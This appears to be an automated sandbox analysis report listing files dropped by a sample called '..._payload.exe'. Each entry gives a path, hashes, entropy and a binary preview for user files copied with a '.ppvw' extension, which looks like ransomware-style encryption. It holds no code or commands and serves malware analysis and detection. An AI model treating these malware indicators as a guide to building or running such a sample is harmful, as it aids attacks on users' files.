                                                                                                                          MD5:DCEF32FC5B1CAEBE91AE897F7D56E8FA
                                                                                                                          SHA1:7AD6C4C311FE2B8297F7ED56D41B08A6BD29DB2B
                                                                                                                          SHA-256:EB6163D5EDD34B2183AEAF11CC3886F994F67BA7422B30B5412394C6A04AEB0E
                                                                                                                          SHA-512:C9910C159EA4026E0DE99458932317745F2D7BFDBDA30CB8D565FE8B15DEC10A9C54E8BAE034A4CEBFA69056DB14532E7BA078A598BF1F40C188F4D2BB1E7BA1
                                                                                                                          Malicious:false
                                                                                                                          Preview:[{000...5..t.'..;..X...(..B..N....I..../8H~....&"H._..B..Z%.$f....RB..PX..P&.:h.8.O.<.....n....?p.z..F.k...3.*...8.?..p;.JY..B.y.I.y.X...\<.........M.q7.e}.i..5..N7.t..,1Ln...i....ij.............x.f...jb.O.6.......Ip.Zzy.@C...u;.q..+...TC4...X2sH.]n..n:.x..)..QD5VW.3.y.....!..z.=*.....~>.....!Q.\24._.nC.ju{.J.y..$C4.S...M....z.).A.......g..U.YS.'phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\Favorites\Reddit.url

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):445
                                                                                                                          Entropy (8bit):7.457716071200414
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:Ms6RUc/3Ihqe2p12YiQlMAvI/zCpDAxc7q5bTcii9a:M0wIhqe+1ftlMTbYsqubD
                                                                                                                          MD5:99D7AF78878675692EEC77A9F835AC5A
                                                                                                                          SHA1:4DB07870CCD09BA5D9A0A868C56DEB3703BF90C4
                                                                                                                          SHA-256:FC3418DC5FCCC183469B86A87C2707763184A2F6E63D00A442889255A996D6E1
                                                                                                                          SHA-512:061EC97F9AC4F8E9AFA54F712C576B612136D4FDA44219CB7AB3A28499DFF410B52E612088F788447E782A1F6CD1AB2568A29FDD2DE15422CF55BD249E461C0D
                                                                                                                          Malicious:false
                                                                                                                          Preview:[{000.`'...~ux|uf....:@..,...T.;j...#A...s.pT.I....g.3=.O.....!..I......m.c.K...~..........,.%@.UX~........+.m..lW..B".<.w..k......5..+y...c.0C3|.|-n.........7.AZkw....(...cI.J.K...M.b...\J...,\.H....|...J*n.x...-../&..yE-.......u.....=..P.........k....._.|`FX......IuTay..v......y.m..W1.K.Q..~7...R.....>.J..^2M..h....aW;..BM..}..\[\kt....Y....J...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\Favorites\Reddit.url.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):445
                                                                                                                          Entropy (8bit):7.457716071200414
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:Ms6RUc/3Ihqe2p12YiQlMAvI/zCpDAxc7q5bTcii9a:M0wIhqe+1ftlMTbYsqubD
                                                                                                                          MD5:99D7AF78878675692EEC77A9F835AC5A
                                                                                                                          SHA1:4DB07870CCD09BA5D9A0A868C56DEB3703BF90C4
                                                                                                                          SHA-256:FC3418DC5FCCC183469B86A87C2707763184A2F6E63D00A442889255A996D6E1
                                                                                                                          SHA-512:061EC97F9AC4F8E9AFA54F712C576B612136D4FDA44219CB7AB3A28499DFF410B52E612088F788447E782A1F6CD1AB2568A29FDD2DE15422CF55BD249E461C0D
                                                                                                                          Malicious:false
                                                                                                                          Preview:[{000.`'...~ux|uf....:@..,...T.;j...#A...s.pT.I....g.3=.O.....!..I......m.c.K...~..........,.%@.UX~........+.m..lW..B".<.w..k......5..+y...c.0C3|.|-n.........7.AZkw....(...cI.J.K...M.b...\J...,\.H....|...J*n.x...-../&..yE-.......u.....=..P.........k....._.|`FX......IuTay..v......y.m..W1.K.Q..~7...R.....>.J..^2M..h....aW;..BM..}..\[\kt....Y....J...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\Favorites\Wikipedia.url

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):448
                                                                                                                          Entropy (8bit):7.454205824391384
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:1nuOeAp6WdHb+c3vos6V8oaRCrzq5bTcii9a:PvlV3Vqg3bD
                                                                                                                          MD5:274862EA0ED5226533C6A9DE7644C3F4
                                                                                                                          SHA1:9233323D007E7F7531A0FE8E3456F03E1957310A
                                                                                                                          SHA-256:49920A21AF74967A502A316A316693847AA70FBB8B3CE4EE2B977BCE71C06F05
                                                                                                                          SHA-512:C86E35BCCB553B7E12F92030DDE2BB0FC64A4BB2122FCCF8BB4F5056F7A7166292BA39E672CD347F0F70F0B2570FF7F0FF866E4BF8BA478B705931C8BD413E7C
                                                                                                                          Malicious:false
                                                                                                                          Preview:[{000.[).g$.D.Y.!..^...f..}.~v.g...5.E......38z...9..z..]&6SHm.^..D."...nU...z.F.....h?....N..*.......V|..=.wSBP=g5.oJ.e.m....q.!.o.$@..;..{4........F.^J...{p....M....o.*......M.d.gQ.{..W.rJ.|?.)nk..N..)........U.R........9lE...rg.E.r....3....Mik+I._......_.@L..5XR.....>......4:.%...lX.>..j..W...EQ...'w..?.\.<......D*.....S !...._~.XP.......phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\Favorites\Wikipedia.url.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):448
                                                                                                                          Entropy (8bit):7.454205824391384
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:1nuOeAp6WdHb+c3vos6V8oaRCrzq5bTcii9a:PvlV3Vqg3bD
                                                                                                                          MD5:274862EA0ED5226533C6A9DE7644C3F4
                                                                                                                          SHA1:9233323D007E7F7531A0FE8E3456F03E1957310A
                                                                                                                          SHA-256:49920A21AF74967A502A316A316693847AA70FBB8B3CE4EE2B977BCE71C06F05
                                                                                                                          SHA-512:C86E35BCCB553B7E12F92030DDE2BB0FC64A4BB2122FCCF8BB4F5056F7A7166292BA39E672CD347F0F70F0B2570FF7F0FF866E4BF8BA478B705931C8BD413E7C
                                                                                                                          Malicious:false
                                                                                                                          Preview:[{000.[).g$.D.Y.!..^...f..}.~v.g...5.E......38z...9..z..]&6SHm.^..D."...nU...z.F.....h?....N..*.......V|..=.wSBP=g5.oJ.e.m....q.!.o.$@..;..{4........F.^J...{p....M....o.*......M.d.gQ.{..W.rJ.|?.)nk..N..)........U.R........9lE...rg.E.r....3....Mik+I._......_.@L..5XR.....>......4:.%...lX.>..j..W...EQ...'w..?.\.<......D*.....S !...._~.XP.......phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\Local Settings\Adobe\Acrobat\DC\AdobeCMapFnt23.lst.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:PostScript document text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1567
                                                                                                                          Entropy (8bit):7.882415954422506
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:g0ctQ0sg8Hvc2xipKoeNyZG3+Q9Qbkwb9EVTwGSkd7bybLnEBFWmGbD:wQ0GPc2opKoeNyBQubuVpJCbLnE8D
                                                                                                                          MD5:FDAAF1518D3AA71B1D6F73168998101D
                                                                                                                          SHA1:BD941EFDB318225FC8C0EBCF642C935D5F56EE79
                                                                                                                          SHA-256:A1AA7D85A946B4F804713CAD42704070E7B2C7691FEC4EBD7C946F0DAD968554
                                                                                                                          SHA-512:80FABC2A7C771682B141EF4DC4744537066DB0588D92A517BA358FEDC0F133E0489054EC69A0817C048B9FF38EFDE4042614818C3D1FE248CC5033B03F27EB0F
                                                                                                                          Malicious:false
                                                                                                                          Preview:%!Ado.jx>N..K.E.!.v)s8E...q^.O.U.g.,.#..W..K]qY?..._4..X.7L..za..=.=\.s....7..i..`..){.jy.t..Y.p..>.O%.....Np.Y..c.......f...[/3..F.-......g5.....$.`.G..Q.....zx.y...`U.....G..V./...K.>..D..pZ.*FV.A.+.3...k....'7.t.......\......D{..!......m...1t...~9...9...a\..+..z......bM.F#.j.U...90...;)..q.:.k.q.~A.......n?...c'....M..;.5.U`w...............TV.i.Wu..3....,.$..Y....s.)..[..\yvB2q..,......}..M..{t.?7..=<.).8E.l.;...K.ma#...}..a..c..k.x.#...A6_.7.V....7..Dd......".94.....=m~6.0l(u$K2J...w..f...8..9......c_H...... .K\. |q......$......z......a..N...5.y...p..f=.~jL(mU.P.g.......>V.r-uT......<....N9..S..$..S;GI@....q..C..SB..3......%.B./..c.sK"..C.!W.TV.w.t.b... .e.t<.... 6..n.C.k.L..UI...Fr..c.8.K.G..!}.|.......s._p.%HR.&...#e).H."x......G...[.ik(.T!H...o.. .B^E.3.]...L....#X%.N....?.....U.4...l#.X.B#....J.o.}.u.j.n..IkJf.R.^.r..........\v/..........r#..a.L..nL.u..... ...QN.H.v".@..H..~.H..~>.Pi...Fq...gR.+.1...92.N......@.rF.g=xt..$.

                                                                                                                          C:\Users\user\Local Settings\Adobe\Acrobat\DC\AdobeSysFnt23.lst.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:PostScript document text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):185433
                                                                                                                          Entropy (8bit):7.875001141120135
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:dNkYzTu0uN01/yGnMmM5tM+5LD2XaUGoHH79fWAh006Dknf4kE0u7xP9XE07ZmaD:dNkYzB4GyXmM5tM+5fCF4AhSkADXE07r
                                                                                                                          MD5:88656099288F098AC43FFD49BDF36F74
                                                                                                                          SHA1:1B4F55C42C1C5C56198CD112E64E5A942A2FE265
                                                                                                                          SHA-256:A8D35036F734899F9E8D2C41DC0D5E444DE15AA19977AEB809CAA37361F1EA4E
                                                                                                                          SHA-512:65EB169E94D5B6CFAB04EF1B3ABA861EF2CA594E41E7DFFA68E836AF804B45AB35BACC5A8E9726F6ECA318EB70E3EF022C6A53F779478114EDA7E3C0807819B1
                                                                                                                          Malicious:false
                                                                                                                          Preview:%!AdoL.....v....zu..d.'.pg..@f...a]d[..I!.z2M.>H.m.B...c...zxTl.F.........4....)z....%..h..o...e.Co~..:.q..bP.\..:.P..Y..C.t...JbdU2.....S..l...N.@.r....s....v..[.....&8..q@.z.(...H..aU.M{....V.ADp.y2.D.....Km..hE.<)E._...d..@B.t.J.%-N..._.!j.....D.#..n.z.........^..G...........5..$w..i. ...pS...... .....`.e.#y.Ik.p)..[{.l.....{],.8..v...M...T..p..M'.\.......n.-..[R.6...._..-...QT....N5r0......%...k....)-..^.y.{.4.{..Am....I.cK.^(..l.T2.x..S....#E*$..9.0.p.g...w.'.3......a.{ U...|uv.G..u..#..m.Ad...t..JM.[.<.^4....<qU..#....7.P.....9........K.S.Ag..,...t...n>...0...t..YI..?.3i..^C..O....@.........c...q..`...Tb.:+>.'..O..u.K.<.}XI...C.Eklu...9.-;...TO..h.!.fR....%ZLW...z\.2.1D.....0....0h*Z._:.....K..`.9...,.....s....AT..{.......:..........0mQn.kpK.b.:.'..XUG..P......Q...._..(.....*..YN..W...D.....Z..t[w5....QH.I.JG9P0] ..o....U.FEZ-JGV..bl...4..3.u.4v.0...Q...............T..pM)......Vg>.....~...(........5Q"..RZ.X.z...n..S. .2....."8-q.*..Q.K.Y(.L....b.

                                                                                                                          C:\Users\user\Local Settings\Adobe\Acrobat\DC\IconCacheAcro65536.dat.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):243530
                                                                                                                          Entropy (8bit):6.819757808718196
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:wvwld+ZQQNd6YmgA6nhjJ2obHn9coAKo9RJe2D6GyqlkGQWBXE5pOolNlnc:FfAQQyYzHX/JAtRk2D6gl/Q9Znc
                                                                                                                          MD5:04AC29C291FD2ACC0601D7D6D623F775
                                                                                                                          SHA1:D6B0FAB0C1479E0A80EDA3343E1EF9D2A1CE99E6
                                                                                                                          SHA-256:AC458EFEB291900FA071C1731AF4B892BC6523F8C383F87D8ED5A46623F3E15B
                                                                                                                          SHA-512:7C3C0EDA87650D9F00F52BA9F797B0299A4D7486A6A91BA85718318D073945E0CE9904994D6B7802B62FF38FB5EC16052ADEF78DB77AF27C514081B240C289AE
                                                                                                                          Malicious:false
                                                                                                                          Preview:Adobe..Cve.g..q<H6F.......r.Y....vd..OU.yD.."........-..Y.3gM..X...n....!....96....N...h=.2z5..5..p?.G..!0.Ng... ]..~(.f.C.V.qf.8...2*.....w|.G..yX..........7.|...)....?....[.....|_..X...m..(.x...H...7.DUH.D~..<..a(.....1Y..@....h.g..~+...`..-.m........g.3.(.3.".;vRU...BnA.l...`.......5..qG7..@E........Y.\...?{.i..........6..ai...m..}...f.2..H>K..i....d.ac..P.....+..4*...#N.(.k!`...3.06.CQlTv..N.HY....2.,U.3...h4.x-5.....8..../)...c..D+!z'o............}........9..#.....\....=..s....E.:....N........4..*.w$..f.}.J.~g8..q..z.L.:...1.c...d.n`......bx.....U....e.%....V.....lC..V;....8..Glg.%......7..]..../IS..W}.._V..u7Y&.zLt........q....m"..U.tK2.........?.....1/...XB,....W....!.V.2*...W}.....w..p....%.;a./TT..Z:qOO.,.....<}.}.C..;....J....aQ..~..S..G.Ik..}%.k.<....>..Vw.3[..f.]f.O..b..E..@kV"...a...LyY...?.cJ5....7.^...A........5...,.....!.........._&..&...Z.......im..d...O....e.Dq.;....#.>ZS..Q....\...E.w....B.P.O..d.,....es...5.

                                                                                                                          C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):67060
                                                                                                                          Entropy (8bit):7.997343046079011
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:L//Mn0WPGoRfMd5IUCgbD8j1bNDorji6rIN6gU6lFjln6:L/E0sGopM3IBgb4jvF6gU6lS
                                                                                                                          MD5:F91677AC5C6F468E443856B0B497AE93
                                                                                                                          SHA1:AF6B0402C75005584AD76BDF41A1E499E00B75DB
                                                                                                                          SHA-256:D83471DC98F60806598BE306D55A144BA9BF7BF519219745AF7931AF59BF148D
                                                                                                                          SHA-512:909FD5BD61CAC9662834B07F6186D8AF7610A84D39253125BADE039E6D8B122693E8F0C2AF664C0CD113D94335CA43C7C0F7132E882A968AF5C9AF27D19D5A15
                                                                                                                          Malicious:true
                                                                                                                          Preview:4.397P}Uf].A...G.s.p_.-.., uxa.'.2Z!...M....?.*.......J.....]f...2H. ....1q...`.....X.%.J..x....I.m.KKc.v;.~E">..%L.....tz....;.....m..'y....C....6.Ylq..$.#.L(..^...~5...W....4?.5d......zWBU..(....qD.g.5.4.U.P..q......f.1.A..._...5.....U&X%...b........_1..._..2.......C.c.8.J...W.......c....E.A.,..F..-m...Mtoc.O.4.;W.i...[...3.K.....Vm\~...........m...D>.....p.{..o..)...#. .7.N...;...EQ.|0.rFG..i.n.H6.}.i.....7.F..Y%E../......\3..H.ag.%c.G..6.....$_.~@4a..eV...kg.?.....&JW0.'m.......a...R......fK^`.h.E.:U....2zy.a.E]9...d.5Nn.....f?>J....Gy.36I.....H..Z7..mh......MX.o...f..\IF-\.(.Z.W.6......$#.j1.`.<..Z.&.y.=y...>Zv..+...'...A..rO..8.3..|...UMWiG=`..P.P.X"/.....f[ ..1.iT.}...."...C......8..?...x...g.&4.~.r..5).fY}(.U.H......RA.V}M.v.7....7.+.%.K.$a.BA....>p..1.j...8-.v..'....pC3.L......"|Z.W....!V.-.....|b.~.D<4.....g..L.w..BP.[^Z..a....=.TY.73.............[..w..,...Qv.O..%......./.....}F.p.&q..s..[.AmU....\D...p2..[.y.=...J.T"..,\.tl ..K

                                                                                                                          C:\Users\user\Local Settings\Adobe\Color\ACECache11.lst.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):932
                                                                                                                          Entropy (8bit):7.74942043671174
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:W3QKIiGZECz6u8tRaqzAdrOtsTrbresfNbD:WArvZfh856OtG3rnVD
                                                                                                                          MD5:9386A03FC52688573F86F77A54AC6440
                                                                                                                          SHA1:623EE31DA244BBD9822ED66AFE5F60EC637FE881
                                                                                                                          SHA-256:B69C7F373D3DC4671D9D10DE85877AE49758906EA212443001CCA7DD0B510ECD
                                                                                                                          SHA-512:1CAA4AEBA203B903B330806CB1597AC82D1ACC930C0994FE5F360446F921C98712468172AEC890D0FB13A73520C3995C9137DC7F11B789AEA090338B912678F4
                                                                                                                          Malicious:false
                                                                                                                          Preview:CPSA..O.8.Q:t..8Eq3ue .q.eZ.......5.bi.....w...\.7U).........Z..`.......Y..\.....8...o..L.4K......TO.%.P.......a.O/.Ei.S.Z.!.s=.3x.\....P.k_.&.~.O.4..9Yk.sL..(...B...&F,.9...s ...h./....!}.~.e<.z....^.._.5.. .#.T.........X..h...?~..M.".R.XD.q.gW.jX.......?]......mE..P.:.").!x......h-....!.#`.......(f...;.l.I.......\q.....K..../..e..\.>R.d.!~...k......U.W..-.8 .^....#..[...kj.......C.v1.......'M&.%..".ss.6j........).k..h)...tR....9.......)c...5.m..7YC.Lw...-..s.h.....I.Z... =...-..g..0g.0k.../.M=XL....f_.t.K+l..Z"...E..f.b"Qrgfo4SoC..r.|.:.. JK...D..4."..7G.%.d...pZ./.N_..............)BO2M...wDp.-.`u{...a.|......&3...DF....o..qHN.......'..K..].ue.m...#;.....xfV..K.m..7sU.`.=..K...w.\....[#'...b.Q..P......T.x..X;kC...a.z.U...Ip.._..d..-|..\...\..P....U?.........z....E...M.t.`.B.@..E.`.5X<R..!.L..\JphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\Local Settings\Comms\UnistoreDB\USS.jcp.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8526
                                                                                                                          Entropy (8bit):7.9748669307175035
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:esGzoGTddQHTn0DwLMGFwPJTx0kL/GwfNx+LZMyudc5nXnu:eDf2He+a0Xw1x++m+
                                                                                                                          MD5:841B9D6FA4785D63054E224ED54D4782
                                                                                                                          SHA1:51D7610803F72288667415A784A52BFC31C86DF9
                                                                                                                          SHA-256:2D9C36BA7DD66424EA150A7A35E185C77F4ECB55DFC323B300A2034433E2BAB2
                                                                                                                          SHA-512:94AF90DEDFE2D8BA5DA45F8D5AA5D04218CD7CEAB5550FB5F28445400D3B0CE99CF3537DF3F3E154ACE231443E940B43F14D95A56182DD426B6B3BE21C57C4EE
                                                                                                                          Malicious:false
                                                                                                                          Preview:.M.#.Z~7.d..M".......F..>.6....@..2.$........Rj.....$.Q..o..m.Z._.....e..~R.i;.[..9.6[.r.b.LS`...4.r.^...k_.....`~....*..%..yo.2.#c....d.^A...0C.b.....R...:...a...q...]...S.v..B(".....P..T^.H..o3...h.f.z....BK|..2..c...g.z'uMB~b.i...I.k....8....w.......H.2H!.5z..zw.k,v.sK.....p\.....`f.y.$......x.........;^..|..puIm.@L.(.?.t?.68.E..&.....RK#.@.u......).?.....a...5....>..>.|U...H3,s.c.>....d..!.)...tn....2/.&..|X.^.0-v9.[o.q^$..\~.0.....5.4...GOE+u.#....".x.k..0&dN.i.p...`evsK....U..yV.N.Il.n...h.Z....+.P..).}.I..+s.......a.a(Y........._......V.<.........d5.E.@.N...\.Z....v.E...8...s.1<2...<.Q..S..;..>A..M..B...5|..`..W..,^1..J.4.z.`3....c...Q. ..6.........A.)..j]............A.R..[....~<....Z:..{...3'.=3.S.r...<K*.2............3....S....-..ih....x...w-?'hz.yE.....vT<Q8}......7.?y...M.J....x...|..#P..............;...L.<....t}y..;.K.dc..m.Q..h-Y..[0...mb....E.?..e..a..0...a...t..F..:RP.k....0.E.......Z.]/.....z.rzF..Jb....pUcvi/...0..

                                                                                                                          C:\Users\user\Local Settings\Comms\UnistoreDB\USS.jtx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3146062
                                                                                                                          Entropy (8bit):1.7334640075714887
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:jnRo1neY/sOdCJT2nVOiGqta7U9qo3agO/qqv4RROYdVbtzFnrG5J5qh+AJ3TGXz:dohjHJVOhqta7UwfCdYS4
                                                                                                                          MD5:39EC1824298E36967CA827588F314790
                                                                                                                          SHA1:C059F3A28887669C7E2C0EA20F2C56F655D407F0
                                                                                                                          SHA-256:4A1977ACCF409CAF56A7E1F268221D5B8FD43EF41904C6A12396BA2FAA4FCDFB
                                                                                                                          SHA-512:AB2CBDBD19CAF12CE8F2CBB2BE04DD9491FFD036F1BB134062826032CE02EB31411AAFA9DCC373CA1C9F5C29254494C1153992990DD5A4289582353735D62E42
                                                                                                                          Malicious:false
                                                                                                                          Preview:...?...1.X.MX."t.}.GgxO.S....*.^..m.G..............Aa.e.t....V.k9....gcQ............%....#z7M...,..]d8.'VM.3~..U......W.w.....tw.|p\292.R...I.tt4.....&.._D.]..K.o...D..QB3F#..=..Tb.w.5.0..^..0.....E....U.}.H..x...s.........^=..7:.l.[19.#.ps.<..+i`.LD.94:.q..........db.y..?.N..G{..p.&@.V..`@Pf..5.B.av.....X..o..`......X........g.j<......O.m..\S.i...'k...gk...qe..7]L}6..d...J...u..%.L...F...{....U...&.......l....., ....-h.+t.J....o... ..{....D.-..L..T..'.[5*.W.4IC.jB.~....(.R...~.,........ZC.......MC5..d...`....T_......~....k....T>..}...Q.d..b!f}@4..<Z....W.+.......tC7.....c[Fr\1o...nA.1...c..Y..o....,.].t.+fA|.c.H3a..>q....."2Z.0....=(...`.....R...?.tf.z`..X}....U..C....#.e.<..C.K,w.!<.......m.B...2..L...@0..;'m..<E.;....Z.|..)...$...h4...........2.=...3 J$.\.T....+...)l.F.3..9..........?.^,...`."...I,AyA...X{.}.....~IC...=....iZ..*...F...-b..^.L....qf..5...v.... se..6...r../.GKV...O.tx..B.........~....P.%z...,.Ah.1..B.'.N.h...

                                                                                                                          C:\Users\user\Local Settings\Comms\UnistoreDB\USSres00001.jrs.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3146062
                                                                                                                          Entropy (8bit):0.6707795981922549
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:XnMgLeeiTh4F/K2lWlZT5ATPXuwmzp/Dk6qZXmRa+A/8aYa9gX4z:XnM2eeIhoyFlKPeRbk5xp+Aqaag
                                                                                                                          MD5:DF8BE8C21ED0310E64D1F83B326E04FC
                                                                                                                          SHA1:20351396134B31CA27F05550CB10EED115065ADE
                                                                                                                          SHA-256:E71172FCA643520744643C985C6B0B29975DB1EF9AFA0A32CFFA847A16BBF40C
                                                                                                                          SHA-512:62AA972E54AFD15D13FCC54C843EF1165CE5D9AC9784D08FD4FD37C8746216F2CFA7BF0BB6B07B8FEE68AFAB37A132DF8AA548347400DCE480F06CAEE5086EE9
                                                                                                                          Malicious:false
                                                                                                                          Preview:.....G=.$.../.......i..3...t.5..Z.-*..COa.`".Lt.._v..q.b. .Tn...60..V..ptQ....JXJ..............mh.*.j.....8...m....;Qy..[Mv.a(,"./dQ.=l..G........}..M.;.sP\/v....W.......X..=&..(7...^.W.Qm.h..Yf\N..>....A4u"....C..J.6P..3.,..FdSv=.......c&... hvD@....0..Q.x...[........i.6.c,.S-W...r..oFM.)MU=9.R.b})m..Bj>:.!.c4b.....DI...z....=.....(4.....Z.:."[.J...g.e.AC..iO...W|GY&..M.V.ys\....4y..f?.i....r..:.mD9s-..{.R...].v..m;..w....7g.#.......j..a8.k&...E.=..J.(S.:..u.C.W].M.&._.g.....D4...-..H&...c..B..R.0.i...O...@*u`.6.N.Z.l..GI...Q.c8@. ......R...N...b...?.#..8..>.W....NzZG.r.....tQb...........}.m..'.B.I4..C......=M..B. 5..9..YI=.}D......H.....`...0... O....3.k....c.Xl..}.2.~..^w0...?4..]7...hv.....b......+..(...'..Z..a}...oN. ^1..RU:K...1ka".B...A.pC.&....X.Cc..e.|../*-%.acNg..8.q.-p..7.J[.R..vB....0H...]...]Z.2..S%.\FL..{r*....2.c.SQLq...:\....2|t+S.sl@[..h#...KYlD...(ol<.4g.........g!-..CV.!.:.....6..5.-..R.%... W....Z.-..6.g.2r_A1..Z.W5S.M...n....B

                                                                                                                          C:\Users\user\Local Settings\Comms\UnistoreDB\USSres00002.jrs.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3146062
                                                                                                                          Entropy (8bit):0.6705422699318089
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:OQ1cgJVuIbc46QjsRDhUIwmiYPXBzKWZFmgUzghhayXw:OhEc8jaDKIP3PXBUJPf
                                                                                                                          MD5:C6A111979AB44270580695CE4FDA7BB0
                                                                                                                          SHA1:5BDAA1A0508EDD3E8DD7FDEC7428B2109F38C029
                                                                                                                          SHA-256:48A114045D9F58124ADBE33811AA5AA9E18BE4D1E02015D8C66D9DB1B893A8AA
                                                                                                                          SHA-512:AF0479AB6586527461B5C5D30E2572C724537E76C3B156D6C3BA15CD6CF8353DE7F1C7C1F2EE7156B503A79D36FB46C6D52B72972FF6B88161D8E6A9E00C36B8
                                                                                                                          Malicious:false
                                                                                                                          Preview:......._..r.MN.V...M.{.{.....1P.?.../iX.k.y^....k......$....$).T..?..f.Y.4....`.Er.....=~....o.4../.t..O..s...aI.(t..<.2..UO.d.X..l.I....D.I= .:...~.....%..>1..ZP..Z3.j......r.f|..0...u.).a..8.Z5h.)<.$F9.aa..aK^...Sq.......A..&`.l.K+:...C2:&0..4,.s;.0<....a.y..n..jZ........v....7..><.wo1:..&..a....uo.D].....I.......".a.Eb+.#.<-".B.Xz8wB'7..d...[\...a1S.).{..vmw-..E..;...v=.{'.u...a{.m..........`......5.o.Be....f.,.eMsN''......o.F5.j......-k3.2....Z..f.(1}.#@..~..q...z..}'7{..sm..?gUh$_u..-.B..1V.<..0..q..M.I.......i.+.X!......n.V.2m..wv..Wd.....%..'9..`..q....2U.zN.l....1.k.\.y&t..s..%.mpc....B...;...=... .+W...eJ.aw}.1.......6}.u(.....x.5...&...,F....fE}..#k...8{.3..\P}B6..A8....%.)...~u.s]D.z.,.w....1g...u..L.......7}.........'.@;.\.~....|.....R. .....Y...r......i.@F.5l...-.5&...rl.? ..Cx..E....z..aH.z... .........H.+m...9...0c.."a.ad.y.];.....)J..........u..eO..J.B....D8.D1.J,.'/...7m...|..x.`..$3.?.Z...Z...F........mCPZF.]...*....l.

                                                                                                                          C:\Users\user\Local Settings\Comms\UnistoreDB\USStmp.jtx.ppvw (copy)

                                                                                                                          Download File
